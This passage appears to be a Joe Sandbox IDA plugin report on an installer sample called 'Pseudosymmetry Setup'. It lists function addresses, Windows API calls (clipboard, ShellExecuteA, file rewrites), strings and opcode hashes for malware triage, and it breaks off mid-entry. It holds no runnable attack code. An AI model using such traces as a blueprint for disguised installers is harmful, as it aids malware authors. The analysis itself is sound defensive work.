Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 73bb1ab9a9e2133c24622a305ca383e6cf0c15aed7991ea78ddb6c48e1fff29f
Instruction ID: 85f2183cf6d0466de3af39f406c7ee36f40fbb46029595ad20bc80e91715a9ea
Opcode Fuzzy Hash: 73bb1ab9a9e2133c24622a305ca383e6cf0c15aed7991ea78ddb6c48e1fff29f
Instruction Fuzzy Hash: 0B0281B0A00209AFEB20DF55DD85AAE7BB5FB84315F14817AF610B62E1C7789D42CF58

Function 00404FBA Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040501A
GetDlgItem.USER32(?,000003EE), ref: 00405029
GetClientRect.USER32(?,?), ref: 00405066
GetSystemMetrics.USER32(00000015), ref: 0040506E
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
ShowWindow.USER32(?,00000008), ref: 0040510A
GetDlgItem.USER32(?,000003EC), ref: 0040512B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
GetDlgItem.USER32(?,000003F8), ref: 00405038

Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2

GetDlgItem.USER32(?,000003EC), ref: 0040517C
CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
CloseHandle.KERNEL32(00000000), ref: 00405191
ShowWindow.USER32(00000000), ref: 004051B4
ShowWindow.USER32(?,00000008), ref: 004051BB
ShowWindow.USER32(00000008), ref: 00405201
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
CreatePopupMenu.USER32 ref: 00405246
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
GetWindowRect.USER32(?,000000FF), ref: 0040527B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
OpenClipboard.USER32(00000000), ref: 004052E0
EmptyClipboard.USER32 ref: 004052E6
GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
GlobalLock.KERNEL32(00000000), ref: 004052F9
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
GlobalUnlock.KERNEL32(00000000), ref: 00405326
SetClipboardData.USER32(00000001,00000000), ref: 00405331
CloseClipboard.USER32 ref: 00405337

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 321c2c842c20468486902e62f90d1f7b9072661f3d185b153136a8a975ac63fb
Instruction ID: 3b51e898b73edb3ed70f647c70819dce3e7a22bfcdd564ae392b58196c58e3f7
Opcode Fuzzy Hash: 321c2c842c20468486902e62f90d1f7b9072661f3d185b153136a8a975ac63fb
Instruction Fuzzy Hash: 59A14871D00208BFEB21AFA0DD85AAE7F79FB04354F10417AFA01BA1A0C7755E519FA9

Function 004042BD Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 268stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040430C
SetWindowTextA.USER32(00000000,?), ref: 00404336
SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
CoTaskMemFree.OLE32(00000000), ref: 004043F2
lstrcmpiA.KERNEL32(Call,00429820), ref: 00404424
lstrcatA.KERNEL32(?,Call), ref: 00404430
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442

Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C

Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E54
Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E66
Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E76

GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E

Strings

A, xrefs: 004043E0
C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens, xrefs: 0040440D
Call, xrefs: 0040441E, 00404423, 0040442E

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call
API String ID: 2246997448-1654900331
Opcode ID: c43d46147b4f9791c57c21938e1ca6ac7e49a3ca4b60a962b273954d3f040232
Instruction ID: 21907f09a7f0adac02db5a20439709df020a6e4e4535a3db2c95f33fac12625f
Opcode Fuzzy Hash: c43d46147b4f9791c57c21938e1ca6ac7e49a3ca4b60a962b273954d3f040232
Instruction Fuzzy Hash: 039171B1900219BBDB11AFA1CC85BAF77B8EF84314F10447BFA04B62C1D77C9A418B69

Function 004062BC Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
Instruction ID: 3a5e1ed114b5ac7a81718889c9b455730d92057392db997c28d832e9e546ba01
Opcode Fuzzy Hash: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
Instruction Fuzzy Hash: 1CE18A71900709DFCB28CF58C880BAABBF5EB45305F15842EE897A76D1E338AA51CF54

Function 00406A93 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc95c657d6a0db03a2642adfba5b6cfeeb14fbd187f09afe888a59338c72224
Instruction ID: b4f25317d252771113a51e42fbe22a4272178205f6f9d8c7b12ddd79a0432499
Opcode Fuzzy Hash: cfc95c657d6a0db03a2642adfba5b6cfeeb14fbd187f09afe888a59338c72224
Instruction Fuzzy Hash: 1FC15B71A002598BCF18CF68C4905EEBBB2FF99314F26817AD856B7384D734A952CF84

Function 004039AC Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
ShowWindow.USER32(?), ref: 00403A05
DestroyWindow.USER32 ref: 00403A19
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
GetDlgItem.USER32(?,?), ref: 00403A56
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
IsWindowEnabled.USER32(00000000), ref: 00403A71
GetDlgItem.USER32(?,00000001), ref: 00403B1F
GetDlgItem.USER32(?,00000002), ref: 00403B29
SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
GetDlgItem.USER32(?,?), ref: 00403C3A
ShowWindow.USER32(00000000,?), ref: 00403C5B
EnableWindow.USER32(?,?), ref: 00403C6D
EnableWindow.USER32(?,?), ref: 00403C88
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
EnableMenuItem.USER32(00000000), ref: 00403CA5
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
lstrlenA.KERNEL32(00429820,?,00429820,Pseudosymmetry Setup), ref: 00403CF9
SetWindowTextA.USER32(?,00429820), ref: 00403D08
ShowWindow.USER32(?,0000000A), ref: 00403E3C

Strings

Pseudosymmetry Setup, xrefs: 00403CEA

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: Pseudosymmetry Setup
API String ID: 184305955-3340433627
Opcode ID: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
Opcode Fuzzy Hash: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E

Function 00403FC8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
GetDlgItem.USER32(00000000,000003E8), ref: 00404067
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
GetSysColor.USER32(?), ref: 00404096
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
lstrlenA.KERNEL32(?), ref: 004040B7
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
GetDlgItem.USER32(?,0000040A), ref: 0040413D
SendMessageA.USER32(00000000), ref: 00404140
GetDlgItem.USER32(?,000003E8), ref: 0040416B
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
SetCursor.USER32(00000000), ref: 004041C3
ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
SetCursor.USER32(00000000), ref: 004041E6
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226

Strings

open, xrefs: 004041CE
N, xrefs: 00404159
Call, xrefs: 00404196

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Pseudosymmetry Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Pseudosymmetry Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Pseudosymmetry Setup
API String ID: 941294808-1567132306
Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5

Function 004058C9 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906

Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9

GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
wsprintfA.USER32 ref: 00405941
GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
GlobalFree.KERNEL32(00000000), ref: 00405A32
CloseHandle.KERNEL32(00000000), ref: 00405A39

Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 00405826
Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848

Strings

NUL, xrefs: 004058D3
%s=%s, xrefs: 00405937
[Rename], xrefs: 004059AB, 004059BD

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: 7635303e975da501c1c3991c5ee2ae1dd735d065c9962b08a0d3fc1ba04b1bfc
Instruction ID: a7ae131883122c305ebb5a94e4791e7dc74bc152dd9dfe90db1d6281d1838ee4
Opcode Fuzzy Hash: 7635303e975da501c1c3991c5ee2ae1dd735d065c9962b08a0d3fc1ba04b1bfc
Instruction Fuzzy Hash: EE41EF71A05A55AFD3206B215C89F6B3A5CEB45758F14053ABE02B22D2DA7CAC018EBD

Function 100023D6 Relevance: 13.6, APIs: 9, Instructions: 130memoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000243D
GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002455
StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002466
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 1000247B
GlobalFree.KERNEL32(00000000), ref: 10002482

Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310

GlobalFree.KERNEL32(?), ref: 100024F0
GlobalFree.KERNEL32(00000000), ref: 10002519

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
String ID:
API String ID: 2278267121-0
Opcode ID: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
Instruction ID: 4c31113825cd6d876adfd950bde12b9626868b5f7bcca2444e77b9607fd07d19
Opcode Fuzzy Hash: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
Instruction Fuzzy Hash: 7A41AEB150825AEFFB11DFA4CDC8E2B7BECFB442C1B124529FA0182168DB31AD40DB25

Function 00405DFC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E54
CharNextA.USER32(?,?,?,00000000), ref: 00405E61
CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E66
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E76

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFD, 00405E02
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 00405E38
*?|<>/":, xrefs: 00405E44

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-894113176
Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction ID: d9f26e5b90d06d21ed3ce52f9e74cde850698f16693a1e2037ff65b0147420f0
Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction Fuzzy Hash: E111C872804B9529EB3217348C44B777F99CB967A0F58047BE8D4722C2D67C5E428EAD

Function 00403EE6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

